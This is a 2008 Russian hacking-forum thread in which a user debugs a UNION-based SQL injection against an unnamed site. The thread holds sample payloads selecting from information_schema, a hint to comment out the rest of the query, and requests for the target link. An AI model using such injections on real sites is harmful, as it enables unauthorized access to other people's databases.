Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

10.08.2008, 23:17
|
|
Познающий
Регистрация: 18.07.2007
Сообщений: 40
Провел на форуме: 72605
Репутация:
13
|
|
sql-injection трабл
Имеется инъекция типа
Код:
http://site/cat/'SQL
где видимо применен mod_rewrite
запрос типа
Код:
http://site/cat/' union select 1,2,3,4
прекрасно выполняется, даже есть поля выводимые на экране, но если попробовать выбрать данные из другой таблицы, например
Код:
http://site/cat/' union select 1,2,3,4 from information_schema.tables
, то возникает ошибка
Причем ошибка появляется и в тестовом случае
Код:
http://site/cat/' union select 1,2,3,4 from (selest 1) as test
хотя версия Mysql - 5.0.51
В чем проблемы?
|
|
|

10.08.2008, 23:26
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Вариантов куча, ни ссылки, ни ошибки, хочешь что-бы все угадывали?
|
|
|

10.08.2008, 23:34
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
Сообщение от ty13r
В чем проблемы?
Ты оставшуюся часть запроса не закомментил, от того и проблемы.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|

11.08.2008, 01:26
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме: 11338585
Репутация:
441
|
|
ссылко в пм или сюда)
|
|
|

11.08.2008, 05:31
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме: 2375039
Репутация:
1160
|
|
Экстрасенсы все на передачку уехали,среди нас не осталось.Ты ссыль дай,а то так "серетишся",как буд-то Aol похекал....ССылку лучше сюда,а не в ПМ
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|